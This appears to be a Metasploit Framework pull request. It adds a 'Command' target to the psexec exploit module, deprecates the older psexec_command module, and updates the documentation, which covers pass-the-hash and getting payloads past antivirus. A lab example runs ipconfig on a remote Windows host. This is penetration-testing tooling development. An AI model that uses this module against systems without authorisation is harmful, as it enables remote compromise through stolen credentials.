### PR TITLE
Add a command target to the main PSexec module

### DIFF
--- a/documentation/modules/exploit/windows/smb/psexec.md
+++ b/documentation/modules/exploit/windows/smb/psexec.md
@@ -1,8 +1,5 @@
-psexec is one of the most popular exploits against Microsoft Windows. It is a great way to test password security and demonstrate how a stolen password could lead to a complete compromise of an entire corporate network.
-
-The Metasploit Framework actually includes different module types of psexec for different scenarios. exploit/windows/smb/psexec is the father of them all and is used the same way
-you normally would with any Metasploit exploits.
-
+PSexec is one of the most popular exploits against Microsoft Windows. It is a great way to test password security and demonstrate how a
+stolen password could lead to a complete compromise of an entire corporate network.
 
 ## Vulnerable Application
 
@@ -11,7 +8,9 @@ To be able to use exploit/windows/smb/psexec:
 1. You must have a valid username/password.
 2. The firewall must allow SMB traffic.
 3. The target must use SMBv1.
-4. The remote Windows machine's network security policy must allow it. If you see [one of these errors](https://github.com/rapid7/metasploit-framework/wiki/What-does-my-Rex%3A%3AProto%3A%3ASMB-Error-mean%3F), then the Windows machine does not allow it.
+4. The remote Windows machine's network security policy must allow it. If you see
+  [one of these errors](https://github.com/rapid7/metasploit-framework/wiki/What-does-my-Rex%3A%3AProto%3A%3ASMB-Error-mean%3F), then the
+  Windows machine does not allow it.
 
 ## Verification Steps
 
@@ -43,7 +42,8 @@ meterpreter >
 
 ## Options
 
-By default, using exploit/windows/smb/psexec can be as simple as setting the RHOST option, and you're ready to go. But in reality, you will probably need to at least configure:
+By default, using exploit/windows/smb/psexec can be as simple as setting the RHOST option, and you're ready to go. But in reality, you will
+probably need to at least configure:
 
 **The SMBUser Option**
 
@@ -58,7 +58,8 @@ This can be either the plain text version or the Windows hash.
 
 **Pass the Hash**
 
-One common penetration testing scenario using psexec is that attackers usually begin by breaking into a box, dumping the hashes, and using some of those hashes to log into other boxes on the network using psexec. So in that scenario, with the following stolen hash:
+One common penetration testing scenario using psexec is that attackers usually begin by breaking into a box, dumping the hashes, and using
+some of those hashes to log into other boxes on the network using psexec. So in that scenario, with the following stolen hash:
 
 ```
 meterpreter > hashdump
@@ -93,28 +94,44 @@ meterpreter >
 
 **Automatic Target**
 
-There are multiple targets available for exploit/windows/smb/psexec. The Automatic target is the default target. If the  Automatic target detects Powershell on the remote machine, it will try Powershell, otherwise it uses the natvie upload. Each target is explained below.
+There are multiple targets available for exploit/windows/smb/psexec. The Automatic target is the default target. If the  Automatic target
+detects Powershell on the remote machine, it will try Powershell, otherwise it uses the natie upload. Each target is explained below.
 
 **Powershell Target**
 
-The Powershell target forces the psexec module to run a Powershell command with a payload embedded in it. Since this approach does not leave anything on disk, it is a very powerful way to evade antivirus. However, older Windows machines might not support Powershell by default.
+The Powershell target forces the psexec module to run a Powershell command with a payload embedded in it. Since this approach does not
+leave anything on disk, it is a very powerful way to evade antivirus. However, older Windows machines might not support Powershell by
+default.
 
-Because of this, you will probably want to use the Automatic target setting. The automatic mode will check if the target supports Powershell before it tries it; the manually set Powershell target won't do that.
+Because of this, you will probably want to use the Automatic target setting. The automatic mode will check if the target supports
+Powershell before it tries it; the manually set Powershell target won't do that.
 
 **Native Upload Target**
 
 The Native target will attempt to upload the payload (executable) to SYSTEM32 (which can be modified with the
 SHARE datastore option), and then execute it with psexec.
 
-This approach is generally reliable, but has a high chance of getting caught by antivirus on the target. To counter this, you can try to use a template by setting the EXE::Path and EXE::Template datastore options. Or, you can supply your own custom EXE by setting the EXE::Custom option.
+This approach is generally reliable, but has a high chance of getting caught by antivirus on the target. To counter this, you can try to
+use a template by setting the EXE::Path and EXE::Template datastore options. Or, you can supply your own custom EXE by setting the
+`EXE::Custom` option.
 
 **MOF Upload Target**
 
-The [MOF](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-WbemExec-for-a-write-privilege-attack-on-Windows) target technically does not use psexec; it does not explicitly tell Windows to execute anything. All it does is upload two files: the payload (exe) in SYSTEM32 and a managed object
-format file in SYSTEM32\wbem\mof\ directory. When Windows sees the MOF file in that directory, it automatically runs it. Once executed, the code inside the MOF file basically tells Windows to execute our payload in SYSTEM32, and you get a session.
+The [MOF](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-WbemExec-for-a-write-privilege-attack-on-Windows) target
+technically does not use psexec; it does not explicitly tell Windows to execute anything. All it does is upload two files: the payload
+(exe) in SYSTEM32 and a managed object format file in SYSTEM32\wbem\mof\ directory. When Windows sees the MOF file in that directory, it
+automatically runs it. Once executed, the code inside the MOF file basically tells Windows to execute our payload in SYSTEM32, and you get
+a session.
 
-Although it's a neat trick, Metasploit's MOF library only works against Windows XP and Windows Server 2003. And since it writes files to disk, there is also a high chance of getting
-caught by antivirus on the target.
+Although it's a neat trick, Metasploit's MOF library only works against Windows XP and Windows Server 2003. And since it writes files to
+disk, there is also a high chance of getting caught by antivirus on the target.
 
-The best way to counter antivirus is still the same. You can either use a different template by setting the EXE::Path and EXE::Template datastore options or you can supply your own custom EXE by setting the EXE::Custom option.
+The best way to counter antivirus is still the same. You can either use a different template by setting the EXE::Path and EXE::Template
+datastore options or you can supply your own custom EXE by setting the EXE::Custom option.
 
+**Command**
+
+The command target causes the psexec operation to execute an operating system command. This can either be a `cmd/windows/` payload provided
+by Metasploit, or the user can specify their own by using the `cmd/windows/generic` payload and setting `CMD`. The output of the command
+will be written to a file and then retrieved so that it is accessible. If the command does not immediately return, then reading the output
+will fail.

--- a/lib/msf/core/exploit/smb/client/psexec.rb
+++ b/lib/msf/core/exploit/smb/client/psexec.rb
@@ -233,15 +233,15 @@ module Exploit::Remote::SMB::Client::Psexec
     end
   end
 
-  def execute_command_with_output(text, bat, cmd, smb_share, r_ip, delay, rt)
+  def execute_command_with_output(text, bat, cmd, smb_share, r_ip, delay: 0, retries: 0)
     res = execute_command(text, bat, cmd)
        if res
-         for i in 0..(rt)
+         for i in 0..(retries)
            Rex.sleep(delay)
            # if the output file is still locked then the program is still likely running
            if (exclusive_access(text, smb_share, r_ip))
              break
-           elsif (i == rt)
+           elsif (i == retries)
              print_error("Command seems to still be executing. Try increasing RETRY and DELAY")
            end
          end

--- a/lib/msf/core/exploit/smb/client/psexec.rb
+++ b/lib/msf/core/exploit/smb/client/psexec.rb
@@ -377,7 +377,7 @@ module Exploit::Remote::SMB::Client::Psexec
     print_status("Getting the command output...")
     output = smb_read_file(smb_share, r_ip, file)
     if output.nil?
-      print_error("Error getting command output. #{$!.class}. #{$!}.")
+      print_error('Error getting command output' + ( $!.nil? ? '' : " #{$!.class}: #{$!}"))
       return
     end
     if output.empty?
@@ -397,7 +397,7 @@ module Exploit::Remote::SMB::Client::Psexec
     end
     files.each do |file|
       begin
-        print_status("checking if the file is unlocked")
+        vprint_status('Checking if the file is unlocked...')
         fd = smb_open(file, 'rwo')
         fd.close
       rescue Rex::Proto::SMB::Exceptions::ErrorCode, RubySMB::Error::RubySMBError => accesserror

--- a/modules/auxiliary/admin/smb/ms17_010_command.rb
+++ b/modules/auxiliary/admin/smb/ms17_010_command.rb
@@ -100,7 +100,7 @@ class MetasploitModule < Msf::Auxiliary
     @ip = ip
 
     # Try and authenticate with given credentials
-    output = execute_command_with_output(text, bat, datastore['COMMAND'], @smbshare, @ip, datastore['RETRY'], datastore['DELAY'])
+    output = execute_command_with_output(text, bat, datastore['COMMAND'], @smbshare, @ip, delay: datastore['DELAY'], retries: datastore['RETRY'])
 
     # Report output
     print_good("Command completed successfully!")

--- a/modules/auxiliary/admin/smb/psexec_command.rb
+++ b/modules/auxiliary/admin/smb/psexec_command.rb
@@ -73,7 +73,7 @@ class MetasploitModule < Msf::Auxiliary
         print_error("Unable to authenticate with given credentials: #{autherror}")
         return
       end
-      output = execute_command_with_output(text, bat, datastore['COMMAND'], @smbshare, @ip, datastore['RETRY'], datastore['DELAY'])
+      output = execute_command_with_output(text, bat, datastore['COMMAND'], @smbshare, @ip, retries: datastore['RETRY'], delay: datastore['DELAY'])
 
       unless output.nil?
         print_good("Command completed successfully!")

--- a/modules/auxiliary/admin/smb/psexec_command.rb
+++ b/modules/auxiliary/admin/smb/psexec_command.rb
@@ -8,6 +8,12 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Auxiliary::Report
   include Msf::Auxiliary::Scanner
 
+  include Msf::Module::Deprecated
+  deprecated(
+    Date.new(2020, 9, 16),
+    reason = "Use exploit/windows/smb/psexec and the 'Command' target with the cmd/windows/generic payload"
+  )
+
   # Aliases for common classes
   SIMPLE = Rex::Proto::SMB::SimpleClient
   XCEPT  = Rex::Proto::SMB::Exceptions

--- a/modules/exploits/windows/smb/psexec.rb
+++ b/modules/exploits/windows/smb/psexec.rb
@@ -59,13 +59,13 @@ class MetasploitModule < Msf::Exploit::Remote
           'DisableNops'  => true
         },
       'Platform'       => 'win',
-      'Arch'           => [ARCH_X86, ARCH_X64],
       'Targets'        =>
         [
-          [ 'Automatic', { } ],
-          [ 'PowerShell', { } ],
-          [ 'Native upload', { } ],
-          [ 'MOF upload', { } ]
+          [ 'Automatic', { 'Arch' => [ARCH_X86, ARCH_X64] } ],
+          [ 'PowerShell', { 'Arch' => [ARCH_X86, ARCH_X64] } ],
+          [ 'Native upload', { 'Arch' => [ARCH_X86, ARCH_X64] } ],
+          [ 'MOF upload', { 'Arch' => [ARCH_X86, ARCH_X64] } ],
+          [ 'Command', { 'Arch' => [ARCH_CMD] } ]
         ],
       'DefaultTarget'  => 0,
       # For the CVE, PsExec was first released around February or March 2001
@@ -84,6 +84,27 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('PSH_PATH', [false, 'Path to powershell.exe', 'Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe']),
         OptString.new('SERVICE_STUB_ENCODER', [false, "Encoder to use around the service registering stub",nil])
       ])
+  end
+
+  def execute_command_payload(smbshare)
+    text = "\\Windows\\Temp\\#{Rex::Text.rand_text_alpha(8..16)}.txt"
+    bat  = "\\Windows\\Temp\\#{Rex::Text.rand_text_alpha(8..16)}.bat"
+    command = payload.encoded
+
+    output = execute_command_with_output(text, bat, command, smbshare, datastore['RHOST'])
+
+    unless output.nil?
+      print_good('Command completed successfully!')
+      print_status("Output for \"#{ command }\":\n")
+      print_line("#{output}\n")
+      report_note(
+        :rhost => datastore['RHOST'],
+        :rport => datastore['RPORT'],
+        :type  => 'psexec_command',
+        :name => command,
+        :data => output
+      )
+    end
   end
 
   def native_upload_with_workaround
@@ -138,6 +159,8 @@ class MetasploitModule < Msf::Exploit::Remote
       native_upload_with_workaround
     when 'MOF upload'
       mof_upload(datastore['SHARE'])
+    when 'Command'
+      execute_command_payload(datastore['SHARE'])
     end
 
     handler

--- a/modules/exploits/windows/smb/psexec.rb
+++ b/modules/exploits/windows/smb/psexec.rb
@@ -74,7 +74,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options(
       [
-        OptString.new('SHARE',     [ true, "The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share", 'ADMIN$' ])
+        OptString.new('SHARE', [false, "The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share", ''])
       ])
 
     register_advanced_options(
@@ -107,7 +107,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
   end
 
-  def native_upload_with_workaround
+  def native_upload_with_workaround(smbshare)
     service_filename = datastore['SERVICE_FILENAME'] || "#{rand_text_alpha(8)}.exe"
     service_encoder = datastore['SERVICE_STUB_ENCODER'] || ''
 
@@ -117,10 +117,19 @@ class MetasploitModule < Msf::Exploit::Remote
       connect(versions: [1])
       smb_login
     end
-    native_upload(datastore['SHARE'], service_filename, service_encoder)
+    native_upload(smbshare, service_filename, service_encoder)
   end
 
   def exploit
+    # automatically select an SMB share unless one is explicitly specified
+    if datastore['SHARE'] && !datastore['SHARE'].blank?
+      smbshare = datastore['SHARE']
+    elsif target.name == 'Command'
+      smbshare = 'C$'
+    else
+      smbshare = 'ADMIN$'
+    end
+
     print_status("Connecting to the server...")
     connect
 
@@ -146,21 +155,21 @@ class MetasploitModule < Msf::Exploit::Remote
 
     case target.name
     when 'Automatic'
-      if powershell_installed?(datastore['SHARE'], datastore['PSH_PATH'])
+      if powershell_installed?(smbshare, datastore['PSH_PATH'])
         print_status('Selecting PowerShell target')
         execute_powershell_payload
       else
         print_status('Selecting native target')
-        native_upload_with_workaround
+        native_upload_with_workaround(smbshare)
       end
     when 'PowerShell'
       execute_powershell_payload
     when 'Native upload'
-      native_upload_with_workaround
+      native_upload_with_workaround(smbshare)
     when 'MOF upload'
-      mof_upload(datastore['SHARE'])
+      mof_upload(smbshare)
     when 'Command'
-      execute_command_payload(datastore['SHARE'])
+      execute_command_payload(smbshare)
     end
 
     handler


### PR DESCRIPTION
This PR adds an `ARCH_CMD` compatible, "Command" target to the psexec module and deprecates the `auxiliary/admin/smb/psexec_command` module. The main `exploit/windows/smb/psexec` module was also updated to automatically select an appropriate SMB share if one isn't specified, this retains the old value of `ADMIN$` for all of the non-Command targets, but allows it to be set to `C$` for the new Command target. Since we now have support for `RHOSTS` it doesn't seem like we need a dedicated module to run commands and get their output any more.

The `auxiliary/admin/smb/ms17_010_command` module had also flipped the order of the RETRY and DELAY options which I corrected. I also added documentation to the psexec module and fixed up the long line errors from the `msftidy_docs` linter. The new section outlines what the Command target does and how to use it to run a custom command like the old module and what will happen if the command runs for a long time.

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] `use auxiliary/admin/smb/psexec_command`
    - [x] See the deprecation warning, date and reason
- [x] `use exploit/windows/smb/psexec`
    - [x] Set the `RHOST`, `SMBUser` and `SMBPass` options appropriately
        - [x] Leaving the target as `Automatic`, set a payload of a Meterpreter using your favorite stager
        - [x] Run the module and receive a session
    - [x] Changing the target to `Command` set the payload to `cmd/windows/generic`
        - [x] Set the `CMD` option to something with output like `ipconfig`
        - [x] Run the module and see the output

## Example

```
msf5 exploit(windows/smb/psexec) > show options 

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOSTS                192.168.159.129  yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SHARE                                  no        The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain             .                no        The Windows domain to use for authentication
   SMBPass               Password1!       no        The password for the specified username
   SMBUser               smcintyre        no        The username to authenticate as


Payload options (cmd/windows/generic):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------
   CMD   ipconfig         yes       The command string to execute


Exploit target:

   Id  Name
   --  ----
   4   Command


msf5 exploit(windows/smb/psexec) > exploit

[*] 192.168.159.129:445 - Connecting to the server...
[*] 192.168.159.129:445 - Authenticating to 192.168.159.129:445 as user 'smcintyre'...
[+] 192.168.159.129:445 - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.159.129:445 - Getting the command output...
[*] 192.168.159.129:445 - Executing cleanup...
[+] 192.168.159.129:445 - Cleanup was successful
[+] 192.168.159.129:445 - Command completed successfully!
[*] 192.168.159.129:445 - Output for "ipconfig":


Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::41f8:356f:73d4:9415%10
   IPv4 Address. . . . . . . . . . . : 192.168.159.129
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.159.2

Ethernet adapter Bluetooth Network Connection:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 


[*] Exploit completed, but no session was created.
msf5 exploit(windows/smb/psexec) >```
